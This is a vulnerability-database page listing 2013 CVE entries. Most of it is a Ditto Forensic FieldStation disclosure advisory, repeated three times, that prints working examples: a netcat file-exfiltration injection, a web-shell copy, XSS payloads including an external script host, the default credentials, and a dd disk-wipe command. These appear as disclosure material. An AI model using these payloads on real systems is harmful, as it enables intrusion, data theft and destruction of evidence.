VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201312-0435 CVE-2013-6883 CRU Ditto Forensic FieldStation Cross-site request forgery vulnerability in some firmware CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in CRU Ditto Forensic FieldStation with firmware before 2013Oct15a allows remote attackers to hijack the authentication of administrators for requests that modify the disk erase technique settings via unspecified vectors. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. A remote attacker could exploit this vulnerability to perform unauthorized operations, such as modifying disk wiping technology settings. ************************************************************** Title: Ditto Forensic FieldStation, multiple vulnerabilities Versions affected: <= 2013Oct15a (all) Vendor: CRU Wiebetech Discovered by: Martin Wundram Email: wundram@digitrace.de Date found: 2013-04-22 Date published: 2013-12-12 Status: partially patched ************************************************************** 0] ======== Introduction / Background / Impact ======== In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one essential requirement is that evidence data does not get modified at all (or not unnoticed, at least). Therefore IT forensic experts use write-blockers to ensure a read-only access to evidence data like hard disks or USB mass storage. The Ditto Forensic FieldStation is such a special equipment (hardware with embedded software) used by forensic experts to analyse and copy evidence data in a safe and secure way. The ditto is explicitly marketed as a device to acquire data from network file shares, too. This means it is meant to be connected to possibly hostile networks of suspects. However it was found to be vulnerable up to the point of not being reliable as a computer forensic device. 1] ======== OS Command Injection ======== Class: Command Injection [CWE-77] Impact: Code execution Remotely Exploitable: Yes CVE Name: CVE-2013-6881 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Several input fields of the web application are vulnerable to OS command injection. E.g. the application allows the setting of parameters like 'sector size' or 'skip count' for a forensic imaging task. Because of improper neutralization in combination with the web server running with root privileges, an attacker is able to access and manipulate the complete system. Example 1 (setting of 'sector size' = 1 with malicious content): 1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666; Example 2 (setting of 'set-size' = 1 with copying a PHP shell from the external SD card): 1;cp /ditto/shell.php /opt/web/htdocs; 2] ======== Persistent XSS ======== Class: Cross-site Scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Status: unpatched CVE Name: CVE-2013-6882 CVSS v2 Base Score: 9 Overall CVSS v2 Score (if patched): 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Overall CVSS v2 Score (unpatched): 10 The web application suffers from multiple vulnerabilities regarding XSS. The first one (a) is critical because an unauthorized attacker is able to push malicious code into the system and consequently attacking every user. The other ones (b) need authentication first. a) The web application logs every login (including the username) in a not sanitized way to a system log. Additionally, the web application embeds that system log rendered as HTML into the start page of every user who successfully logs in. Thus an unprivileged attacker can persistently inject malicious code which attacks all users of the vulnerable system immediately after their login. Example: POSTDATA= user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E &pass=demo&login=Log+In b) It is easily possible to submit malicious data as input into multiple HTML form fields (e.g. one can force the system to load externally hosted JavaScript code with <script src=http://www.hacker.tld/code.js></script>). This can result in dangerous situations where the (external) JavaScript code mangles the information displayed about important computer forensic key values whose integrity is crucial. Example: 784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone", "verify actions: yes" instead of "no", ... 3] ======== Cross-Site Request Forgery ======== Class: Cross-Site Request Forgery [CWE-352] Impact: Application misuse Remotely Exploitable: Yes CVE Name: CVE-2013-6883 CVSS v2 Base Score: 6.6 Overall CVSS v2 Score: 8 CVSS v2 Vector: (AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The web application is vulnerable to attacks using Cross-Site Request Forgery. E.g. the disk erase technique (correct settings are important for the reliable deletion of sensitive forensic data) can be changed with a simple POST request. 4] ======== Misconfigured Daemon Rights ======== Class: Configuration [CWE-16] Impact: Full system access The web server lighthttpd and the PHP engine are run as user 'root'. Thus injection weaknesses in the 'ditto' web application result in immediate full system access. 5] ======== Unneeded Daemons/Software ======== Class: Configuration [CWE-16] Impact: Attackable services Best matching CCE-ID: CCE-4268-9 Forensic usage needs only write-blocking and imaging of evidence data. However, the base system contains further active software and services. This helps attacking the system and escalating privileges. The tools/daemons are especially netcat and an active SSHd. Furthermore, the SSHd binds to the network port which is labeled as 'source' and thus intended for usage in supposedly hostile network environments - the network containing evidence data from suspects. 6] ======== Use of standard credentials ======== Class: Use of Hard-coded Credentials [CWE-798] Impact: unwanted full system access Remotely Exploitable: Yes CVE Name: CVE-2013-6884 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The ditto write-blocker contains a default system user named 'ditto' with the default password 'ditto' which is allowed to elevate its user rights to root (sudo) without further authentication. In combination with the active SSHd, this vulnerability allows attackers full access to the ditto if it gets connected to the same/reachable network. 7] ======== Misconfigured Core System ======== Class: Configuration [CWE-16] Impact: Alteration of evidence data Remotely Exploitable: Yes Although explicitly marketed as a hardware write-blocker, the ditto does not implement any specific write-blocking mechanism at all. The underlying system is able to manipulate or even erase evidence on devices which are connected to the 'source side' of the ditto. The problem is: no hardware-level, no driver- level and no kernel-level (blockdev) write-blocking are implemented. Only the web application prevents the user from writing to the source media. That is just security by obscurity. Finally, every critical weakness or simple malfunction in the web application can potentiallly lead to overwriting of source/evidence data. Furthermore, the embedded Linux system itself mounts the system partition as writable. Thus malware could be persistently deployed! Example: One can simply overwrite supposedly write-protected source data (USB stick and SATA disk) with dd if=/dev/zero of=/dev/sda. 8] ======== Solution ======== Upgrade your ditto to the newest available firmware (2013Oct15a). Don't connect the device to potentially hostile networks. Examine your device if it has been manipulated at an earlier time (has someone placed a backdoor in the embedded Linux, or a malware which silently manipulates evidence data or copies of evidence data?). 9] ======== Report Timeline ======== 2013-04-22 Discovery of vulnerabilities 2013-04-23 First contact with vendor including agreement about later public disclosure 2013-04-26 Detailed information about vulnerabilities provided to vendor 2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a 2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a 2013-11-26 Information with details provided to vendor about upcoming public disclosure. Vendor gave feedback regarding technical accuracy of this report 2013-12-12 Public disclosure 10] ======== Discussion ======== Because integrity is of utmost importance during the forensic process (correct handling of evidence data and correct deduction of conclusions and implications), even small vulnerabilities in forensic tools and devices become critical. 11] ======== References ======== a) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013oct15a/ b) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013jun30a/ -- Diplom-Wirtschaftsinformatiker Martin G. Wundram DigiTrace GmbH - Kompetenz in IT-Forensik Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram Registergericht K\xf6ln, HR B 72919 USt-IdNr: DE278529699 Zollstockg\xfcrtel 59, 50969 K\xf6ln Telefon: 0221-6 77 86 95-0 Website: www.DigiTrace.de E-Mail: info@DigiTrace.de
VAR-201401-0273 CVE-2013-6884 CRU Ditto Forensic FieldStation Of firmware write-blocker Vulnerability gained in CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The write-blocker in CRU Ditto Forensic FieldStation with firmware before 2013Oct15a has a default "ditto" username and password, which allows remote attackers to gain privileges. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. The vulnerability comes from the fact that the program uses the default username and password. A remote attacker could exploit this vulnerability to gain privileges. ************************************************************** Title: Ditto Forensic FieldStation, multiple vulnerabilities Versions affected: <= 2013Oct15a (all) Vendor: CRU Wiebetech Discovered by: Martin Wundram Email: wundram@digitrace.de Date found: 2013-04-22 Date published: 2013-12-12 Status: partially patched ************************************************************** 0] ======== Introduction / Background / Impact ======== In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one essential requirement is that evidence data does not get modified at all (or not unnoticed, at least). Therefore IT forensic experts use write-blockers to ensure a read-only access to evidence data like hard disks or USB mass storage. The Ditto Forensic FieldStation is such a special equipment (hardware with embedded software) used by forensic experts to analyse and copy evidence data in a safe and secure way. The ditto is explicitly marketed as a device to acquire data from network file shares, too. This means it is meant to be connected to possibly hostile networks of suspects. However it was found to be vulnerable up to the point of not being reliable as a computer forensic device. 1] ======== OS Command Injection ======== Class: Command Injection [CWE-77] Impact: Code execution Remotely Exploitable: Yes CVE Name: CVE-2013-6881 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Several input fields of the web application are vulnerable to OS command injection. E.g. the application allows the setting of parameters like 'sector size' or 'skip count' for a forensic imaging task. Because of improper neutralization in combination with the web server running with root privileges, an attacker is able to access and manipulate the complete system. Example 1 (setting of 'sector size' = 1 with malicious content): 1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666; Example 2 (setting of 'set-size' = 1 with copying a PHP shell from the external SD card): 1;cp /ditto/shell.php /opt/web/htdocs; 2] ======== Persistent XSS ======== Class: Cross-site Scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Status: unpatched CVE Name: CVE-2013-6882 CVSS v2 Base Score: 9 Overall CVSS v2 Score (if patched): 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Overall CVSS v2 Score (unpatched): 10 The web application suffers from multiple vulnerabilities regarding XSS. The first one (a) is critical because an unauthorized attacker is able to push malicious code into the system and consequently attacking every user. The other ones (b) need authentication first. a) The web application logs every login (including the username) in a not sanitized way to a system log. Additionally, the web application embeds that system log rendered as HTML into the start page of every user who successfully logs in. Thus an unprivileged attacker can persistently inject malicious code which attacks all users of the vulnerable system immediately after their login. Example: POSTDATA= user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E &pass=demo&login=Log+In b) It is easily possible to submit malicious data as input into multiple HTML form fields (e.g. one can force the system to load externally hosted JavaScript code with <script src=http://www.hacker.tld/code.js></script>). This can result in dangerous situations where the (external) JavaScript code mangles the information displayed about important computer forensic key values whose integrity is crucial. Example: 784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone", "verify actions: yes" instead of "no", ... 3] ======== Cross-Site Request Forgery ======== Class: Cross-Site Request Forgery [CWE-352] Impact: Application misuse Remotely Exploitable: Yes CVE Name: CVE-2013-6883 CVSS v2 Base Score: 6.6 Overall CVSS v2 Score: 8 CVSS v2 Vector: (AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The web application is vulnerable to attacks using Cross-Site Request Forgery. E.g. the disk erase technique (correct settings are important for the reliable deletion of sensitive forensic data) can be changed with a simple POST request. 4] ======== Misconfigured Daemon Rights ======== Class: Configuration [CWE-16] Impact: Full system access The web server lighthttpd and the PHP engine are run as user 'root'. Thus injection weaknesses in the 'ditto' web application result in immediate full system access. 5] ======== Unneeded Daemons/Software ======== Class: Configuration [CWE-16] Impact: Attackable services Best matching CCE-ID: CCE-4268-9 Forensic usage needs only write-blocking and imaging of evidence data. However, the base system contains further active software and services. This helps attacking the system and escalating privileges. The tools/daemons are especially netcat and an active SSHd. Furthermore, the SSHd binds to the network port which is labeled as 'source' and thus intended for usage in supposedly hostile network environments - the network containing evidence data from suspects. 6] ======== Use of standard credentials ======== Class: Use of Hard-coded Credentials [CWE-798] Impact: unwanted full system access Remotely Exploitable: Yes CVE Name: CVE-2013-6884 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The ditto write-blocker contains a default system user named 'ditto' with the default password 'ditto' which is allowed to elevate its user rights to root (sudo) without further authentication. In combination with the active SSHd, this vulnerability allows attackers full access to the ditto if it gets connected to the same/reachable network. 7] ======== Misconfigured Core System ======== Class: Configuration [CWE-16] Impact: Alteration of evidence data Remotely Exploitable: Yes Although explicitly marketed as a hardware write-blocker, the ditto does not implement any specific write-blocking mechanism at all. The underlying system is able to manipulate or even erase evidence on devices which are connected to the 'source side' of the ditto. The problem is: no hardware-level, no driver- level and no kernel-level (blockdev) write-blocking are implemented. Only the web application prevents the user from writing to the source media. That is just security by obscurity. Finally, every critical weakness or simple malfunction in the web application can potentiallly lead to overwriting of source/evidence data. Furthermore, the embedded Linux system itself mounts the system partition as writable. Thus malware could be persistently deployed! Example: One can simply overwrite supposedly write-protected source data (USB stick and SATA disk) with dd if=/dev/zero of=/dev/sda. 8] ======== Solution ======== Upgrade your ditto to the newest available firmware (2013Oct15a). Don't connect the device to potentially hostile networks. Examine your device if it has been manipulated at an earlier time (has someone placed a backdoor in the embedded Linux, or a malware which silently manipulates evidence data or copies of evidence data?). 9] ======== Report Timeline ======== 2013-04-22 Discovery of vulnerabilities 2013-04-23 First contact with vendor including agreement about later public disclosure 2013-04-26 Detailed information about vulnerabilities provided to vendor 2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a 2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a 2013-11-26 Information with details provided to vendor about upcoming public disclosure. Vendor gave feedback regarding technical accuracy of this report 2013-12-12 Public disclosure 10] ======== Discussion ======== Because integrity is of utmost importance during the forensic process (correct handling of evidence data and correct deduction of conclusions and implications), even small vulnerabilities in forensic tools and devices become critical. 11] ======== References ======== a) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013oct15a/ b) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013jun30a/ -- Diplom-Wirtschaftsinformatiker Martin G. Wundram DigiTrace GmbH - Kompetenz in IT-Forensik Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram Registergericht K\xf6ln, HR B 72919 USt-IdNr: DE278529699 Zollstockg\xfcrtel 59, 50969 K\xf6ln Telefon: 0221-6 77 86 95-0 Website: www.DigiTrace.de E-Mail: info@DigiTrace.de
VAR-201312-0434 CVE-2013-6882 CRU Ditto Forensic FieldStation Firmware cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in CRU Ditto Forensic FieldStation with firmware 2013Oct15a and earlier allow (1) remote attackers to inject arbitrary web script or HTML via the username parameter in a login or (2) remote authenticated users to inject arbitrary web script or HTML via unspecified form fields. Ditto Forensic FieldStation is prone to multiple html-injection vulnerabilities, an unspecified cross-site request-forgery vulnerability, multiple remote command-injection vulnerabilities and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions. CRU Ditto Forensic FieldStation is a data capture and data analysis device in the WiebeTech family of American CRU company. The device clones disks and creates disk images over the network or VPN, and is capable of recording user activities for forensic analysis. ************************************************************** Title: Ditto Forensic FieldStation, multiple vulnerabilities Versions affected: <= 2013Oct15a (all) Vendor: CRU Wiebetech Discovered by: Martin Wundram Email: wundram@digitrace.de Date found: 2013-04-22 Date published: 2013-12-12 Status: partially patched ************************************************************** 0] ======== Introduction / Background / Impact ======== In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one essential requirement is that evidence data does not get modified at all (or not unnoticed, at least). Therefore IT forensic experts use write-blockers to ensure a read-only access to evidence data like hard disks or USB mass storage. The Ditto Forensic FieldStation is such a special equipment (hardware with embedded software) used by forensic experts to analyse and copy evidence data in a safe and secure way. The ditto is explicitly marketed as a device to acquire data from network file shares, too. This means it is meant to be connected to possibly hostile networks of suspects. However it was found to be vulnerable up to the point of not being reliable as a computer forensic device. 1] ======== OS Command Injection ======== Class: Command Injection [CWE-77] Impact: Code execution Remotely Exploitable: Yes CVE Name: CVE-2013-6881 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Several input fields of the web application are vulnerable to OS command injection. E.g. the application allows the setting of parameters like 'sector size' or 'skip count' for a forensic imaging task. Because of improper neutralization in combination with the web server running with root privileges, an attacker is able to access and manipulate the complete system. Example 1 (setting of 'sector size' = 1 with malicious content): 1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666; Example 2 (setting of 'set-size' = 1 with copying a PHP shell from the external SD card): 1;cp /ditto/shell.php /opt/web/htdocs; 2] ======== Persistent XSS ======== Class: Cross-site Scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Status: unpatched CVE Name: CVE-2013-6882 CVSS v2 Base Score: 9 Overall CVSS v2 Score (if patched): 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Overall CVSS v2 Score (unpatched): 10 The web application suffers from multiple vulnerabilities regarding XSS. The first one (a) is critical because an unauthorized attacker is able to push malicious code into the system and consequently attacking every user. The other ones (b) need authentication first. a) The web application logs every login (including the username) in a not sanitized way to a system log. Additionally, the web application embeds that system log rendered as HTML into the start page of every user who successfully logs in. Thus an unprivileged attacker can persistently inject malicious code which attacks all users of the vulnerable system immediately after their login. Example: POSTDATA= user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E &pass=demo&login=Log+In b) It is easily possible to submit malicious data as input into multiple HTML form fields (e.g. one can force the system to load externally hosted JavaScript code with <script src=http://www.hacker.tld/code.js></script>). This can result in dangerous situations where the (external) JavaScript code mangles the information displayed about important computer forensic key values whose integrity is crucial. Example: 784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone", "verify actions: yes" instead of "no", ... 3] ======== Cross-Site Request Forgery ======== Class: Cross-Site Request Forgery [CWE-352] Impact: Application misuse Remotely Exploitable: Yes CVE Name: CVE-2013-6883 CVSS v2 Base Score: 6.6 Overall CVSS v2 Score: 8 CVSS v2 Vector: (AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The web application is vulnerable to attacks using Cross-Site Request Forgery. E.g. the disk erase technique (correct settings are important for the reliable deletion of sensitive forensic data) can be changed with a simple POST request. 4] ======== Misconfigured Daemon Rights ======== Class: Configuration [CWE-16] Impact: Full system access The web server lighthttpd and the PHP engine are run as user 'root'. Thus injection weaknesses in the 'ditto' web application result in immediate full system access. 5] ======== Unneeded Daemons/Software ======== Class: Configuration [CWE-16] Impact: Attackable services Best matching CCE-ID: CCE-4268-9 Forensic usage needs only write-blocking and imaging of evidence data. However, the base system contains further active software and services. This helps attacking the system and escalating privileges. The tools/daemons are especially netcat and an active SSHd. Furthermore, the SSHd binds to the network port which is labeled as 'source' and thus intended for usage in supposedly hostile network environments - the network containing evidence data from suspects. 6] ======== Use of standard credentials ======== Class: Use of Hard-coded Credentials [CWE-798] Impact: unwanted full system access Remotely Exploitable: Yes CVE Name: CVE-2013-6884 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The ditto write-blocker contains a default system user named 'ditto' with the default password 'ditto' which is allowed to elevate its user rights to root (sudo) without further authentication. In combination with the active SSHd, this vulnerability allows attackers full access to the ditto if it gets connected to the same/reachable network. 7] ======== Misconfigured Core System ======== Class: Configuration [CWE-16] Impact: Alteration of evidence data Remotely Exploitable: Yes Although explicitly marketed as a hardware write-blocker, the ditto does not implement any specific write-blocking mechanism at all. The underlying system is able to manipulate or even erase evidence on devices which are connected to the 'source side' of the ditto. The problem is: no hardware-level, no driver- level and no kernel-level (blockdev) write-blocking are implemented. Only the web application prevents the user from writing to the source media. That is just security by obscurity. Finally, every critical weakness or simple malfunction in the web application can potentiallly lead to overwriting of source/evidence data. Furthermore, the embedded Linux system itself mounts the system partition as writable. Thus malware could be persistently deployed! Example: One can simply overwrite supposedly write-protected source data (USB stick and SATA disk) with dd if=/dev/zero of=/dev/sda. 8] ======== Solution ======== Upgrade your ditto to the newest available firmware (2013Oct15a). Don't connect the device to potentially hostile networks. Examine your device if it has been manipulated at an earlier time (has someone placed a backdoor in the embedded Linux, or a malware which silently manipulates evidence data or copies of evidence data?). 9] ======== Report Timeline ======== 2013-04-22 Discovery of vulnerabilities 2013-04-23 First contact with vendor including agreement about later public disclosure 2013-04-26 Detailed information about vulnerabilities provided to vendor 2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a 2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a 2013-11-26 Information with details provided to vendor about upcoming public disclosure. Vendor gave feedback regarding technical accuracy of this report 2013-12-12 Public disclosure 10] ======== Discussion ======== Because integrity is of utmost importance during the forensic process (correct handling of evidence data and correct deduction of conclusions and implications), even small vulnerabilities in forensic tools and devices become critical. 11] ======== References ======== a) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013oct15a/ b) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013jun30a/ -- Diplom-Wirtschaftsinformatiker Martin G. Wundram DigiTrace GmbH - Kompetenz in IT-Forensik Gesch\xe4ftsf\xfchrer: Alexander Sigel, Martin Wundram Registergericht K\xf6ln, HR B 72919 USt-IdNr: DE278529699 Zollstockg\xfcrtel 59, 50969 K\xf6ln Telefon: 0221-6 77 86 95-0 Website: www.DigiTrace.de E-Mail: info@DigiTrace.de
VAR-201312-0485 CVE-2013-7127 Apple Mac OS X Run on Safari Vulnerability in which important information is obtained CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Apple Safari 6.0.5 on Mac OS X 10.7.5 and 10.8.5 stores cleartext credentials in LastSession.plist, which allows local users to obtain sensitive information by reading this file. Apple Safari is prone to an information-disclosure vulnerability. Successful exploits may allow attackers to gain access to sensitive information. Information obtained may lead to further attacks. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
VAR-201312-0501 CVE-2013-7059 Nano-10 PLC Remote Denial of Service Vulnerability (CNVD-2013-15610) CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Nano-10 PLC is a programmable logic controller. A remote denial of service vulnerability exists in the implementation of the Nano-10 PLC r82. An attacker could exploit this vulnerability to cause the affected device to crash. Nano-10 PLC running firmware prior to r82 are vulnerable. ** ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided
VAR-201312-0247 CVE-2013-6958 Juniper ScreenOS vulnerable to denial-of-service (DoS) CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Juniper NetScreen Firewall running ScreenOS 5.4, 6.2, or 6.3, when the Ping of Death screen is disabled, allows remote attackers to cause a denial of service via a crafted packet. ScreenOS provided by Juniper Networks contains a denial-of-service (DoS) vulnerability. Shuichiro Suzuki of FFRI, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.When processing a malicious packet, the device may hang. ScreenOS is prone to an unspecified denial-of-service vulnerability. Successful exploits may allow the attacker to cause denial-of-service conditions. ScreenOS 5.4, 6.2.0, and 6.3.0 are vulnerable. Juniper Networks NetScreen Firewall running Juniper ScreenOS is an operating system of Juniper Networks (Juniper Networks) that runs on NetScreen series firewalls. ############################################################## FFRI, Inc. === Reference === CVE No. : CVE-2013-6958 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6958 Mozilla Foundation Security Advisory : https://www.mozilla.org/security/announce/2013/mfsa2013-33.html FFRI Advisory URL: http://www.ffri.jp/cgi-bin/advisory/advisory.cgi?type=release&id=FFRRA-20131213 === About FFRI === FFRI is a leading security products and service vendor in Japan providing innovative security software and vulnerability research information. Our commitment is to secure our IT-driven society by protecting information system from unpredictable threats. http://www.ffri.jp research-feedback@ffri.jp === Copyright === 2007 - 2014 FFRI, Inc. All rights reserved
VAR-201402-0569 No CVE Huawei B593u-12 and T-Mobile HOME NET Router have multiple vulnerabilities CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Huawei B593u-12 and T-Mobile HOME NET Router are both wireless router products. Huawei B593u-12 and T-Mobile HOME NET Router have information disclosure vulnerabilities, security restriction bypass vulnerabilities, command injection vulnerabilities, directory traversal vulnerabilities, and cross-site request forgery vulnerabilities. A remote attacker can obtain sensitive information, perform administrator actions, bypass security restrictions, access arbitrary files, execute arbitrary commands, and gain unauthorized access to affected devices. An information-disclosure vulnerability 2. A security-bypass vulnerability 3. A command-injection vulnerability 4. A directory-traversal vulnerability. 5. Other attacks are also possible
VAR-201312-0062 CVE-2013-2813 plural Cooper Power Systems Product of DNP3 Service disruption in components (DoS) Vulnerabilities CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateways allows remote attackers to cause a denial of service (reboot or link outage) via a crafted DNP3 TCP packet. Cooper Power Systems The SMP Gateway is a data concentrator deployed in the energy sector. Attackers can exploit this issue to force the application to reboot, causing denial-of-service conditions. The device can collect and store field instrument data in real time, and transmit it to the remote monitoring center
VAR-201312-0064 CVE-2013-2816 plural Cooper Power Systems Product of DNP3 Service disruption in components (DoS) Vulnerabilities CVSS V2: 4.7
CVSS V3: -
Severity: MEDIUM
The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateways allows physically proximate attackers to cause a denial of service (reboot or link outage) via crafted input over a serial line. Cooper Power Systems The SMP Gateway is a data concentrator deployed in the energy sector. Attackers can exploit this issue to force the application to reboot; causing denial-of-service conditions. The device can collect and store field instrument data in real time, and transmit it to the remote monitoring center
VAR-201312-0406 CVE-2013-6193 plural HP LaserJet Service operation interruption in printer products (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Unspecified vulnerability on HP LaserJet M1522n and M2727; LaserJet Pro 100, 300, 400, CM1415fnw, CP1*, M121*, M1536dnf, and P1*; Color LaserJet CM* and CP*; and TopShot LaserJet Pro M275 printers allows remote attackers to cause a denial of service via unknown vectors. plural HP LaserJet Printer products have service disruption (DoS) There are vulnerabilities that are put into a state.Service disruption by a third party (DoS) There is a possibility of being put into a state. HP LaserJet Printers is a family of laser printers developed by Hewlett Packard. Exploiting this issue allows remote attackers to trigger denial-of-service conditions. HP LaserJet M1522n, etc. are all multifunctional printer products of Hewlett-Packard (HP) in the United States. Security flaws exist in several HP products
VAR-201312-0255 CVE-2013-6966 Cisco WebEx Training Center Open redirect vulnerability CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
Open redirect vulnerability in Cisco WebEx Training Center allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka Bug ID CSCul36031. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible. This issue is being tracked by Cisco Bug ID CSCul36031. The program provides a wealth of tools for online classrooms, online training, and online exams
VAR-201312-0457 CVE-2013-6709 Cisco WebEx Training Center Vulnerability that bypasses access restrictions in registered components CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The registration component in Cisco WebEx Training Center provides the training-session URL before payment is completed, which allows remote attackers to bypass intended access restrictions and join an audio conference by entering credential fields from this URL, aka Bug ID CSCul57111. Cisco WebEx Training Center is prone to multiple information-disclosure vulnerabilities. Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks. These issues are being tracked by Cisco bug ID CSCul57111. The program provides a wealth of tools for online classrooms, online training, and online exams
VAR-201312-0458 CVE-2013-6710 Cisco WebEx Training Center Vulnerable to cross-site request forgery CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
